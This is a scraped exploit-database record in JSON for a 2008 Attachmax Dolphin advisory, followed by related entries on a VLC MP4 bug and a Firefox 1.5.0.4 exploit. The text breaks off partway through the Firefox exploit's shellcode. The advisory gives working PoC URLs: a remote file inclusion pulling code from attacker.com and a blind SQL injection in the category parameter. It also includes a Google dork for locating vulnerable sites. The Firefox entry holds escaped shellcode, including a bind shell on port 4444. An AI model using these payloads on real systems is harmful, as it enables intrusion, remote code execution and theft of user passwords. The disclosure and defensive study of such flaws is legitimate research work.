ID 1337DAY-ID-3677 Type zdt Reporter K-159 Modified 2008-09-16T00:00:00
Description
Exploit for unknown platform in category web applications
==========================================================
Attachmax Dolphin <= 2.1.0 Multiple Remote Vulnerabilities
==========================================================
-----------------------------------------------------------------------------------------
[ECHO_ADV_101$2008] Attachmax Dolphin <= 2.1.0 Multiple Vulnerability
-----------------------------------------------------------------------------------------
Author : K-159
Date : September, 16 th 2008
Location : Jakarta, Indonesia
Critical Lvl : High
Impact : System access
Where : From Remote
---------------------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : Attachmax Dolphin
version : <= 2.1.0
Vendor : http://www.attachmax.com/
Description :
Attachmax allows you to run your very own youtube Video Community site, just like popular Videos sites
such as youtube, dailymotion and revver. Additionally Attachmax includes the ability for Images and Files,
following the trend of other popular File Sharing communities such as Imageshack and Rapidshare.
So not only do you get a fully functional Video Script, but a complete File Sharing Website.
---------------------------------------------------------------------------
Vulnerability:
~~~~~~~~~~~~~
1. Remote File Inclusion Vulnerability
Input passed to the "rel_path" parameter in config.php page is not properly verified before being used
to include files.This can be exploited to include arbitrary files from local or external resources.
Successful exploitation requires that "register_globals" is enabled.
Poc/Exploit:
~~~~~~~~~
http://www.example.com/[path]/config.php?rel_path=http://www.attacker.com/evil?
2. File info disclosure Vulnerability
File info.php in main folder not protected to see directly from browser and could allow an attacker
to obtain sensitive information from the server.
Poc:
~~~
http://www.example.com/[path]/info.php
3. Blind SQL Injection Vulnerability.
Input passed to the "category" parameter in search.php page is not properly verified before being used
in an sql query.
This can be exploited thru the browser to manipulate SQL queries and pull the username and password
from users in plain text.
Poc/Exploit:
~~~~~~~~~~~
http://www.example.com/[path]/index.php?page=Search&category=[BlindSQL]
Dork:
~~~~
Google : "2007 Attachmax" or inurl:"controller.php?page=profile"
Solution:
~~~~~~
- Edit the source code to ensure that input is properly verified.
- Turn off register_globals in php.ini
- Rename info.php.
Timeline:
~~~~~~~~
- 24 - 08 - 2008 bug found
- 02 - 09 - 2008 vendor contacted
- 16 - 09 - 2008 advisory released
---------------------------------------------------------------------------
Shoutz:
~~~~
~ "Happy 5th Anniversary" for ECHO.
~ ping - my dearest wife, zautha - my beloved son, and my beloved next children.
~ "Happy Wedding" for (y3dips,the_day,Negatif),moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,pushm0v,az001,
the_hydra,neng chika, str0ke
~ SK,pokleyzz,Abond,an0maly,cybertank, super_temon, b120t0,inggar,fachri,adi,rahmat,indra
~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,sakitjiwa,x16,cyb3rh3b
~ dr188le,SinChan,h4ntu,cow_1seng,poniman_coy,paman_gembul,ketut,rizal,cR4SH3R,
kuntua, stev_manado,nofry,k1tk4t,0pt1c
# 0day.today [2018-04-14] #
{"id": "1337DAY-ID-3677", "bulletinFamily": "exploit", "title": "Attachmax Dolphin <= 2.1.0 Multiple Remote Vulnerabilities", "description": "Exploit for unknown platform in category web applications", "published": "2008-09-16T00:00:00", "modified": "2008-09-16T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://0day.today/exploit/description/3677", "reporter": "K-159", "references": [], "cvelist": [], "type": "zdt", "lastseen": "2018-04-14T17:49:01", "history": [{"bulletin": {"bulletinFamily": "exploit", "cvelist": [], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Exploit for unknown platform in category web applications", "edition": 1, "enchantments": {"score": {"modified": "2016-04-19T01:40:55", "value": 4.7, "vector": "AV:N/AC:L/Au:M/C:N/I:P/A:P/"}}, "hash": "231f90ed09a20e715fa4a23a695b0133f79f97983f79b360beec0175e6fbd6a7", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "47aee48ac9bae506a1c165025726180d", "key": "sourceHref"}, {"hash": "189f9a4bc3cb6ee7386da3b515df5609", "key": "sourceData"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "c2d379ce05282060b38c2a71df1a7be5", "key": "href"}, {"hash": "77b159cd4b49f028edb60897b1bce8fa", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "93ccd863ba476deb26625d4ebbb32caf", "key": "title"}, {"hash": "d32bfc00c83e3a6ac54949c265514bd4", "key": "reporter"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "77b159cd4b49f028edb60897b1bce8fa", "key": "published"}], "history": [], "href": "http://0day.today/exploit/description/3677", "id": "1337DAY-ID-3677", "lastseen": "2016-04-19T01:40:55", "modified": "2008-09-16T00:00:00", "objectVersion": "1.0", "published": "2008-09-16T00:00:00", "references": [], "reporter": "K-159", "sourceData": "==========================================================\r\nAttachmax Dolphin <= 2.1.0 Multiple Remote Vulnerabilities\r\n==========================================================\r\n\r\n\r\n\r\n-----------------------------------------------------------------------------------------\r\n[ECHO_ADV_101$2008] Attachmax Dolphin <= 2.1.0 Multiple Vulnerability\r\n-----------------------------------------------------------------------------------------\r\n\r\nAuthor : K-159\r\nDate : September, 16 th 2008\r\nLocation : Jakarta, Indonesia\r\nCritical Lvl : High\r\nImpact : System access\r\nWhere : From Remote\r\n---------------------------------------------------------------------------\r\n\r\nAffected software description:\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n\r\nApplication : Attachmax Dolphin\r\nversion : <= 2.1.0\r\nVendor : http://www.attachmax.com/\r\nDescription :\r\n\r\nAttachmax allows you to run your very own youtube Video Community site, just like popular Videos sites\r\nsuch as youtube, dailymotion and revver. Additionally Attachmax includes the ability for Images and Files,\r\nfollowing the trend of other popular File Sharing communities such as Imageshack and Rapidshare. \r\nSo not only do you get a fully functional Video Script, but a complete File Sharing Website.\r\n\r\n---------------------------------------------------------------------------\r\n\r\nVulnerability:\r\n~~~~~~~~~~~~~\r\n\r\n1. Remote File Inclusion Vulnerability\r\n\r\nInput passed to the \"rel_path\" parameter in config.php page is not properly verified before being used \r\nto include files.This can be exploited to include arbitrary files from local or external resources.\r\nSuccessful exploitation requires that \"register_globals\" is enabled.\r\n\r\n\r\nPoc/Exploit:\r\n~~~~~~~~~\r\nhttp://www.example.com/[path]/config.php?rel_path=http://www.attacker.com/evil?\r\n\r\n\r\n2. File info disclosure Vulnerability\r\n\r\nFile info.php in main folder not protected to see directly from browser and could allow an attacker \r\nto obtain sensitive information from the server.\r\n\r\nPoc:\r\n~~~\r\nhttp://www.example.com/[path]/info.php\r\n\r\n\r\n3. Blind SQL Injection Vulnerability.\r\n\r\nInput passed to the \"category\" parameter in search.php page is not properly verified before being used \r\nin an sql query.\r\nThis can be exploited thru the browser to manipulate SQL queries and pull the username and password\r\nfrom users in plain text.\r\n\r\nPoc/Exploit:\r\n~~~~~~~~~~~\r\nhttp://www.example.com/[path]/index.php?page=Search&category=[BlindSQL]\r\n\r\n\r\n\r\nDork:\r\n~~~~\r\nGoogle : \"2007 Attachmax\" or inurl:\"controller.php?page=profile\"\r\n\r\n\r\nSolution:\r\n~~~~~~\r\n\r\n- Edit the source code to ensure that input is properly verified.\r\n- Turn off register_globals in php.ini\r\n- Rename info.php.\r\n\r\nTimeline:\r\n~~~~~~~~\r\n\r\n- 24 - 08 - 2008 bug found\r\n- 02 - 09 - 2008 vendor contacted\r\n- 16 - 09 - 2008 advisory released\r\n---------------------------------------------------------------------------\r\n\r\nShoutz:\r\n~~~~\r\n~ \"Happy 5th Anniversary\" for ECHO.\r\n~ ping - my dearest wife, zautha - my beloved son, and my beloved next children.\r\n~ \"Happy Wedding\" for (y3dips,the_day,Negatif),moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,pushm0v,az001,\r\nthe_hydra,neng chika, str0ke\r\n~ SK,pokleyzz,Abond,an0maly,cybertank, super_temon, b120t0,inggar,fachri,adi,rahmat,indra\r\n~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,sakitjiwa,x16,cyb3rh3b\r\n~ dr188le,SinChan,h4ntu,cow_1seng,poniman_coy,paman_gembul,ketut,rizal,cR4SH3R,\r\nkuntua, stev_manado,nofry,k1tk4t,0pt1c\r\n\r\n\r\n\n# 0day.today [2016-04-19] #", "sourceHref": "http://0day.today/exploit/3677", "title": "Attachmax Dolphin <= 2.1.0 Multiple Remote Vulnerabilities", "type": "zdt", "viewCount": 0}, "differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-19T01:40:55"}], "edition": 2, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "00157601768b634735774d15ccd18f9e"}, {"key": "href", "hash": "c2a9ebcac7e6bd44521fa9be758d6789"}, {"key": "modified", "hash": "77b159cd4b49f028edb60897b1bce8fa"}, {"key": "published", "hash": "77b159cd4b49f028edb60897b1bce8fa"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "d32bfc00c83e3a6ac54949c265514bd4"}, {"key": "sourceData", "hash": "a4a778422044398baf3f5775d8e15d16"}, {"key": "sourceHref", "hash": "2aa7bfdee8ea15ebaad42e2f81b90f0a"}, {"key": "title", "hash": "93ccd863ba476deb26625d4ebbb32caf"}, {"key": "type", "hash": "0678144464852bba10aa2eddf3783f0a"}], "hash": "e607c64dd415cc4b25815ec39842ed1ae3877fa488ff976e6fb7dab2676e2358", "viewCount": 0, "enchantments": {"vulnersScore": 4.7}, "objectVersion": "1.3", "sourceHref": "https://0day.today/exploit/3677", "sourceData": "==========================================================\r\nAttachmax Dolphin <= 2.1.0 Multiple Remote Vulnerabilities\r\n==========================================================\r\n\r\n\r\n\r\n-----------------------------------------------------------------------------------------\r\n[ECHO_ADV_101$2008] Attachmax Dolphin <= 2.1.0 Multiple Vulnerability\r\n-----------------------------------------------------------------------------------------\r\n\r\nAuthor : K-159\r\nDate : September, 16 th 2008\r\nLocation : Jakarta, Indonesia\r\nCritical Lvl : High\r\nImpact : System access\r\nWhere : From Remote\r\n---------------------------------------------------------------------------\r\n\r\nAffected software description:\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n\r\nApplication : Attachmax Dolphin\r\nversion : <= 2.1.0\r\nVendor : http://www.attachmax.com/\r\nDescription :\r\n\r\nAttachmax allows you to run your very own youtube Video Community site, just like popular Videos sites\r\nsuch as youtube, dailymotion and revver. Additionally Attachmax includes the ability for Images and Files,\r\nfollowing the trend of other popular File Sharing communities such as Imageshack and Rapidshare. \r\nSo not only do you get a fully functional Video Script, but a complete File Sharing Website.\r\n\r\n---------------------------------------------------------------------------\r\n\r\nVulnerability:\r\n~~~~~~~~~~~~~\r\n\r\n1. Remote File Inclusion Vulnerability\r\n\r\nInput passed to the \"rel_path\" parameter in config.php page is not properly verified before being used \r\nto include files.This can be exploited to include arbitrary files from local or external resources.\r\nSuccessful exploitation requires that \"register_globals\" is enabled.\r\n\r\n\r\nPoc/Exploit:\r\n~~~~~~~~~\r\nhttp://www.example.com/[path]/config.php?rel_path=http://www.attacker.com/evil?\r\n\r\n\r\n2. File info disclosure Vulnerability\r\n\r\nFile info.php in main folder not protected to see directly from browser and could allow an attacker \r\nto obtain sensitive information from the server.\r\n\r\nPoc:\r\n~~~\r\nhttp://www.example.com/[path]/info.php\r\n\r\n\r\n3. Blind SQL Injection Vulnerability.\r\n\r\nInput passed to the \"category\" parameter in search.php page is not properly verified before being used \r\nin an sql query.\r\nThis can be exploited thru the browser to manipulate SQL queries and pull the username and password\r\nfrom users in plain text.\r\n\r\nPoc/Exploit:\r\n~~~~~~~~~~~\r\nhttp://www.example.com/[path]/index.php?page=Search&category=[BlindSQL]\r\n\r\n\r\n\r\nDork:\r\n~~~~\r\nGoogle : \"2007 Attachmax\" or inurl:\"controller.php?page=profile\"\r\n\r\n\r\nSolution:\r\n~~~~~~\r\n\r\n- Edit the source code to ensure that input is properly verified.\r\n- Turn off register_globals in php.ini\r\n- Rename info.php.\r\n\r\nTimeline:\r\n~~~~~~~~\r\n\r\n- 24 - 08 - 2008 bug found\r\n- 02 - 09 - 2008 vendor contacted\r\n- 16 - 09 - 2008 advisory released\r\n---------------------------------------------------------------------------\r\n\r\nShoutz:\r\n~~~~\r\n~ \"Happy 5th Anniversary\" for ECHO.\r\n~ ping - my dearest wife, zautha - my beloved son, and my beloved next children.\r\n~ \"Happy Wedding\" for (y3dips,the_day,Negatif),moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,pushm0v,az001,\r\nthe_hydra,neng chika, str0ke\r\n~ SK,pokleyzz,Abond,an0maly,cybertank, super_temon, b120t0,inggar,fachri,adi,rahmat,indra\r\n~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,sakitjiwa,x16,cyb3rh3b\r\n~ dr188le,SinChan,h4ntu,cow_1seng,poniman_coy,paman_gembul,ketut,rizal,cR4SH3R,\r\nkuntua, stev_manado,nofry,k1tk4t,0pt1c\r\n\r\n\r\n\n# 0day.today [2018-04-14] #"}
{"result": {"zdt": [{"lastseen": "2018-04-08T23:43:06", "references": [], "description": "Exploit for linux platform in category dos / poc", "edition": 1, "reporter": "Hans Jerry Illikainen", "published": "2017-12-17T00:00:00", "title": "VLC 2.2.8 MP4 Demux Type Conversion Vulnerability", "type": "zdt", "enchantments": {"score": {"modified": "2018-04-08T23:43:06", "vector": "AV:N/AC:L/Au:M/C:P/I:N/A:P/", "value": 4.7}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2017-17670"], "modified": "2017-12-17T00:00:00", "id": "1337DAY-ID-29240", "href": "https://0day.today/exploit/description/29240", "sourceData": "About\r\n=====\r\n\r\nA type conversion vulnerability exist in the MP4 demux module in VLC\r\n<=2.2.8. This issue has been assigned CVE-2017-17670 and it could be\r\nused to cause an arbitrary free.\r\n\r\n\r\nDetails\r\n=======\r\n\r\nMP4 is a container format for video, audio, subtitles and images. The\r\nvarious parts of an .mp4 are organized as hierarchical boxes/atoms in\r\nbig-endian byte ordering [1].\r\n\r\nVLC processes these boxes by using a lookup table:\r\n\r\nvlc-2.2.8/modules/demux/mp4/libmp4.c\r\n,----\r\n| 3297 static const struct\r\n| 3298 {\r\n| 3299 uint32_t i_type;\r\n| 3300 int (*MP4_ReadBox_function )( stream_t *p_stream, MP4_Box_t *p_box );\r\n| 3301 void (*MP4_FreeBox_function )( MP4_Box_t *p_box );\r\n| 3302 uint32_t i_parent; /* set parent to restrict, duplicating if needed; 0 for any */\r\n| 3303 } MP4_Box_Function [] =\r\n| 3304 {\r\n| 3305 /* Containers */\r\n| 3306 { ATOM_moov, MP4_ReadBoxContainer, MP4_FreeBox_Common, 0 },\r\n| 3307 { ATOM_trak, MP4_ReadBoxContainer, MP4_FreeBox_Common, ATOM_moov },\r\n| ....\r\n| 3565 /* Last entry */\r\n| 3566 { 0, MP4_ReadBox_default, NULL, 0 }\r\n| 3567 };\r\n`----\r\n\r\nvlc-2.2.8/modules/demux/mp4/libmp4.c\r\n,----\r\n| 3574 static MP4_Box_t *MP4_ReadBox( stream_t *p_stream, MP4_Box_t *p_father )\r\n| 3575 {\r\n| 3576 MP4_Box_t *p_box = calloc( 1, sizeof( MP4_Box_t ) ); /* Needed to ensure simple on error handler */\r\n| 3577 unsigned int i_index;\r\n| ....\r\n| 3582 if( !MP4_ReadBoxCommon( p_stream, p_box ) )\r\n| 3583 {\r\n| ....\r\n| 3587 }\r\n| ....\r\n| 3605 /* Now search function to call */\r\n| 3606 for( i_index = 0; ; i_index++ )\r\n| 3607 {\r\n| ....\r\n| 3613 if( ( MP4_Box_Function[i_index].i_type == p_box->i_type )||\r\n| 3614 ( MP4_Box_Function[i_index].i_type == 0 ) )\r\n| 3615 {\r\n| 3616 break;\r\n| 3617 }\r\n| 3618 }\r\n| 3619\r\n| 3620 if( !(MP4_Box_Function[i_index].MP4_ReadBox_function)( p_stream, p_box ) )\r\n| 3621 {\r\n| 3622 MP4_BoxFree( p_stream, p_box );\r\n| 3623 return NULL;\r\n| 3624 }\r\n| 3625\r\n| 3626 return p_box;\r\n| 3627 }\r\n`----\r\n\r\n\r\nMP4_ReadBox() allocates a MP4_Box_t structure and invokes\r\nMP4_ReadBoxCommon() to read the properties common to all mp4 boxes;\r\n`i_size' and `i_type' (and optionally an extended size). Afterwards,\r\nMP4_Box_Function is used to dispatch further parsing to a suitable\r\nfunction based on its `i_type'.\r\n\r\nWhen VLC is done with the boxes, they are freed with MP4_BoxFree():\r\n\r\nvlc-2.2.8/modules/demux/mp4/libmp4.c\r\n,----\r\n| 3633 void MP4_BoxFree( stream_t *s, MP4_Box_t *p_box )\r\n| 3634 {\r\n| 3635 unsigned int i_index;\r\n| ....\r\n| 3650 /* Now search function to call */\r\n| 3651 if( p_box->data.p_payload )\r\n| 3652 {\r\n| 3653 for( i_index = 0; ; i_index++ )\r\n| 3654 {\r\n| ....\r\n| 3660 if( ( MP4_Box_Function[i_index].i_type == p_box->i_type )||\r\n| 3661 ( MP4_Box_Function[i_index].i_type == 0 ) )\r\n| 3662 {\r\n| 3663 break;\r\n| 3664 }\r\n| 3665 }\r\n| 3666 if( MP4_Box_Function[i_index].MP4_FreeBox_function == NULL )\r\n| 3667 {\r\n| ....\r\n| 3677 }\r\n| 3678 else\r\n| 3679 {\r\n| 3680 MP4_Box_Function[i_index].MP4_FreeBox_function( p_box );\r\n| 3681 }\r\n| ....\r\n| 3685 }\r\n`----\r\n\r\nAgain, `i_type' is used to find a suitable free-function.\r\n\r\nThe reason this may be problematic is that `i_type' could be changed\r\nwhen VLC handles `sinf' and `frma' boxes in TrackCreateES() -- meaning\r\nthat a box may be read as one type, and freed as another.\r\n\r\n`sinf' is the \"Protection Scheme Information Box\" and it's used for\r\nprotected/encrypted media. `frma' is the \"Original Format Box\" and it's\r\nused to declare the format of the unprotected media.\r\n\r\nIf a sinf/frma is found underneath a sample box, the `i_type' of that\r\nsample is replaced with the original format declared in the `frma':\r\n\r\nvlc-2.2.8/modules/demux/mp4/mp4.c\r\n,----\r\n| 2180 static int TrackCreateES( demux_t *p_demux, mp4_track_t *p_track,\r\n| 2181 unsigned int i_chunk, es_out_id_t **pp_es )\r\n| 2182 {\r\n| ....\r\n| 2208 p_sample = MP4_BoxGet( p_track->p_stsd, \"[%d]\",\r\n| 2209 i_sample_description_index - 1 );\r\n| ....\r\n| 2219 p_track->p_sample = p_sample;\r\n| 2220\r\n| 2221 if( ( p_frma = MP4_BoxGet( p_track->p_sample, \"sinf/frma\" ) ) && p_frma->data.p_frma )\r\n| 2222 {\r\n| 2223 msg_Warn( p_demux, \"Original Format Box: %4.4s\", (char *)&p_frma->data.p_frma->i_type );\r\n| 2224\r\n| 2225 p_sample->i_type = p_frma->data.p_frma->i_type;\r\n| 2226 }\r\n| ....\r\n`----\r\n\r\nNo sanity check is done to make sure that the MP4_FreeBox_function\r\nassociated with the new `i_type' is compatible with the old\r\nMP4_ReadBox_function.\r\n\r\n\r\nExample\r\n=======\r\n\r\nOne way to abuse the type change is to have a `soun' changed to a\r\n`vide'. This results in a 72-byte allocation (x86-64) for the\r\n`p_sample_soun' member of the p_box->data union when the box is read:\r\n\r\nvlc-2.2.8/modules/demux/mp4/libmp4.c\r\n,----\r\n| 1614 static int MP4_ReadBox_sample_soun( stream_t *p_stream, MP4_Box_t *p_box )\r\n| 1615 {\r\n| 1616 p_box->i_handler = ATOM_soun;\r\n| 1617 MP4_READBOX_ENTER( MP4_Box_data_sample_soun_t );\r\n| ....\r\n`----\r\n\r\nvlc-2.2.8/modules/demux/mp4/libmp4.h\r\n,----\r\n| 1351 #define MP4_READBOX_ENTER( MP4_Box_data_TYPE_t ) \\\r\n| ....\r\n| 1369 if( !( p_box->data.p_payload = calloc( 1, sizeof( MP4_Box_data_TYPE_t ) ) ) ) \\\r\n| 1370 { \\\r\n| ....\r\n| 1373 }\r\n`----\r\n\r\nwhere `p_box' is MP4_Box_t:\r\n\r\nvlc-2.2.8/modules/demux/mp4/libmp4.h\r\n,----\r\n| 1284 typedef struct MP4_Box_s\r\n| 1285 {\r\n| ....\r\n| 1296 MP4_Box_data_t data; /* union of pointers on extended data depending\r\n| 1297 on i_type (or i_usertype) */\r\n| ....\r\n| 1306 } MP4_Box_t;\r\n`----\r\n\r\nand MP4_Box_data_t:\r\n\r\nvlc-2.2.8/modules/demux/mp4/libmp4.h\r\n,----\r\n| 1200 typedef union MP4_Box_data_s\r\n| 1201 {\r\n| ....\r\n| 1220 MP4_Box_data_sample_vide_t *p_sample_vide;\r\n| 1221 MP4_Box_data_sample_soun_t *p_sample_soun;\r\n| ....\r\n| 1278 void *p_payload; /* for unknow type */\r\n| 1279 } MP4_Box_data_t;\r\n`----\r\n\r\n,----\r\n| (gdb) p sizeof(MP4_Box_data_sample_soun_t)\r\n| $1 = 72\r\n`----\r\n\r\nAfter the box has had its type changed to `vide' and it's later freed,\r\nthe `p_sample_vide' member of the p_box->data union is used:\r\n\r\nvlc-2.2.8/modules/demux/mp4/libmp4.c\r\n,----\r\n| 1861 void MP4_FreeBox_sample_vide( MP4_Box_t *p_box )\r\n| 1862 {\r\n| 1863 FREENULL( p_box->data.p_sample_vide->p_qt_image_description );\r\n| 1864 }\r\n`----\r\n\r\n,----\r\n| (gdb) p sizeof(MP4_Box_data_sample_vide_t)\r\n| $2 = 96\r\n| (gdb)\r\n`----\r\n\r\nvlc-2.2.8/modules/demux/mp4/libmp4.h\r\n,----\r\n| 529 typedef struct MP4_Box_data_sample_vide_s\r\n| 530 {\r\n| ...\r\n| 557 uint8_t *p_qt_image_description;\r\n| 558\r\n| 559 } MP4_Box_data_sample_vide_t;\r\n`----\r\n\r\n`p_sample_vide' is 24 bytes larger than `p_sample_soun', and\r\n`p_qt_image_description' is at the end of the vide struct; i.e. the\r\npointer to be free()d is read out-of-bounds from potentially\r\nuser-controlled memory.\r\n\r\n`mkmp4.py' at [2]\r\n\r\n,----\r\n| $ uname -imrs\r\n| FreeBSD 11.1-RELEASE-p4 amd64 GENERIC\r\n| $ ./mkmp4.py file.mp4\r\n| $ vlc --version\r\n| VLC media player 2.2.8 Weatherwax (revision 2.2.7-14-g3cc1d8cba9)\r\n| $ gdb -q --args vlc file.mp4\r\n| (gdb) set breakpoint pending on\r\n| (gdb) b libmp4.c:1618\r\n| No source file named libmp4.c.\r\n| Breakpoint 1 (libmp4.c:1618) pending.\r\n| (gdb) b libmp4.c:1863\r\n| No source file named libmp4.c.\r\n| Breakpoint 2 (libmp4.c:1863) pending.\r\n| (gdb) r\r\n| [...]\r\n| Breakpoint 3, MP4_ReadBox_sample_soun (p_stream=0x802ab2710, p_box=0x802a85000) at demux/mp4/libmp4.c:1618\r\n| 1618 p_box->data.p_sample_soun->p_qt_description = NULL;\r\n| (gdb) p p_box->data.p_sample_soun\r\n| $1 = (MP4_Box_data_sample_soun_t *) 0x802a79810\r\n| (gdb) c\r\n| Continuing.\r\n|\r\n| Breakpoint 4, MP4_FreeBox_sample_vide (p_box=0x802a85000) at demux/mp4/libmp4.c:1863\r\n| 1863 FREENULL( p_box->data.p_sample_vide->p_qt_image_description );\r\n| (gdb) p p_box->data.p_sample_vide\r\n| $2 = (MP4_Box_data_sample_vide_t *) 0x802a79810\r\n| (gdb) p p_box->data.p_sample_vide->p_qt_image_description\r\n| $3 = (uint8_t *) 0x1122334455667788 <Error reading address 0x1122334455667788: Bad address>\r\n| (gdb) b free\r\n| Breakpoint 5 at 0x8019d3ce4\r\n| (gdb) c\r\n| Continuing.\r\n|\r\n| Breakpoint 5, 0x00000008019d3ce4 in free () from /lib/libc.so.7\r\n| (gdb) p/x $rdi\r\n| $4 = 0x1122334455667788\r\n| (gdb) c\r\n| Continuing.\r\n|\r\n| Program received signal SIGBUS, Bus error.\r\n| 0x00000008019d36f3 in realloc () from /lib/libc.so.7\r\n| (gdb) x/i $rip\r\n| 0x8019d36f3 <realloc+3939>: mov rbx,QWORD PTR [rax+rcx*8+0x68]\r\n| (gdb) i r\r\n| rax 0x1122334455600000 1234605616436084736\r\n| rbx 0x1122334455667788 1234605616436508552\r\n| rcx 0x5a 90\r\n| [...]\r\n| (gdb) bt 4\r\n| #0 0x00000008019d36f3 in realloc () from /lib/libc.so.7\r\n| #1 0x00000008019d3d51 in free () from /lib/libc.so.7\r\n| #2 0x0000000806d7fafd in MP4_FreeBox_sample_vide (p_box=0x802a85000) at demux/mp4/libmp4.c:1863\r\n| #3 0x0000000806d7fcfd in MP4_BoxFree (s=0x802ab2710, p_box=0x802a85000) at demux/mp4/libmp4.c:3680\r\n`----\r\n\r\n\r\nSolution\r\n========\r\n\r\nThis issue does not affect the HEAD of the VLC master branch.\r\n\r\n\r\n\r\nFootnotes\r\n_________\r\n\r\n[1] [http://xhelmboyx.tripod.com/formats/mp4-layout.txt]\r\n\r\n[2] [https://gist.github.com/dyntopia/194d912287656f66dd502158b0cd2e68]\r\n\r\n\r\n-- \r\nhji\n\n# 0day.today [2018-04-08] #", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/29240"}, {"lastseen": "2018-02-07T01:24:26", "references": [], "description": "Exploit for multiple platform in category remote exploits", "edition": 2, "reporter": "H D Moore", "published": "2006-07-28T00:00:00", "title": "Mozilla Firefox <= 1.5.0.4 Javascript Navigator Object Code Execution PoC ", "type": "zdt", "enchantments": {"score": {"modified": "2018-02-07T01:24:26", "vector": "AV:N/AC:L/Au:M/C:N/I:N/A:P/", "value": 3.3}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2006-07-28T00:00:00", "id": "1337DAY-ID-8733", "href": "https://0day.today/exploit/description/8733", "sourceData": "=========================================================================\r\nMozilla Firefox <= 1.5.0.4 Javascript Navigator Object Code Execution PoC\r\n=========================================================================\r\n\r\n<!--\r\nFirefox <= 1.5.0.4 Javascript navigator Object Code Execution PoC \r\nhttp://browserfun.blogspot.com/\r\n\r\nThe following bug (mfsa2006-45) was tested on the Firefox 1.5.0.4 running \r\non Windows 2000 SP4, Windows XP SP4, and a recently updated Gentoo Linux system. \r\nThis bug was reported by TippingPoint and fixed in the latest 1.5.0.5 release of \r\nMozilla Firefox. This is different from the bug I reported (mfsa2006-48) and is \r\ntrivial to turn into a working exploit. The demonstration link below will attempt \r\nto launch \"calc.exe\" on Windows systems and \"touch /tmp/METASPLOIT\" on Linux systems.\r\n\r\nwindow.navigator = (0x01020304 / 2);\r\njava.lang.reflect.Runtime.newInstance( java.lang.Class.forName(\"java.lang.Runtime\"), 0);\r\n\r\n-->\r\n\r\n<html><body><script>\r\n\r\n// MoBB Demonstration\r\nfunction Demo() {\r\n\r\n\t// Exploit for http://www.mozilla.org/security/announce/2006/mfsa2006-45.html\r\n\t// https://bugzilla.mozilla.org/show_bug.cgi?id=342267\r\n\t// CVE-2006-3677\r\n\r\n\t// The Java plugin is required for this to work\r\n\r\n\t// win32 = calc.exe\r\n\tvar shellcode_win32 = unescape('%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%uc031%u8b64%u3040%uc085%u0c78%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u808b%u00b0%u0000%u688b%u5f3c%uf631%u5660%uf889%uc083%u507b%u7e68%ue2d8%u6873%ufe98%u0e8a%uff57%u63e7%u6c61%u2e63%u7865%u0065');\r\n\tvar fill_win32 = unescape('%u0800');\r\n\tvar addr_win32 = 0x08000800;\r\n\t\r\n\t// linux = touch /tmp/METASPLOIT (unreliable)\r\n\tvar shellcode_linux = unescape('%u0b6a%u9958%u6652%u2d68%u8963%u68e7%u732f%u0068%u2f68%u6962%u896e%u52e3%u16e8%u0000%u7400%u756f%u6863%u2f20%u6d74%u2f70%u454d%u4154%u5053%u4f4c%u5449%u5700%u8953%ucde1%u8080');\r\n\tvar fill_linux = unescape('%ua8a8');\r\n\tvar addr_linux = -0x58000000; // Integer wrap: 0xa8000000\r\n\r\n\t// mac os x ppc = bind a shell to 4444\r\n\tvar shellcode_macppc = unescape('%u3860%u0002%u3880%u0001%u38a0%u0006%u3800%u0061%u4400%u0002%u7c00%u0278%u7c7e%u1b78%u4800%u000d%u0002%u115c%u0000%u0000%u7c88%u02a6%u38a0%u0010%u3800%u0068%u7fc3%uf378%u4400%u0002%u7c00%u0278%u3800%u006a%u7fc3%uf378%u4400%u0002%u7c00%u0278%u7fc3%uf378%u3800%u001e%u3880%u0010%u9081%uffe8%u38a1%uffe8%u3881%ufff0%u4400%u0002%u7c00%u0278%u7c7e%u1b78%u38a0%u0002%u3800%u005a%u7fc3%uf378%u7ca4%u2b78%u4400%u0002%u7c00%u0278%u38a5%uffff%u2c05%uffff%u4082%uffe5%u3800%u0042%u4400%u0002%u7c00%u0278%u7ca5%u2a79%u4082%ufffd%u7c68%u02a6%u3863%u0028%u9061%ufff8%u90a1%ufffc%u3881%ufff8%u3800%u003b%u7c00%u04ac%u4400%u0002%u7c00%u0278%u7fe0%u0008%u2f62%u696e%u2f63%u7368%u0000%u0000');\r\n\tvar fill_macppc = unescape('%u0c0c');\r\n\tvar addr_macppc = 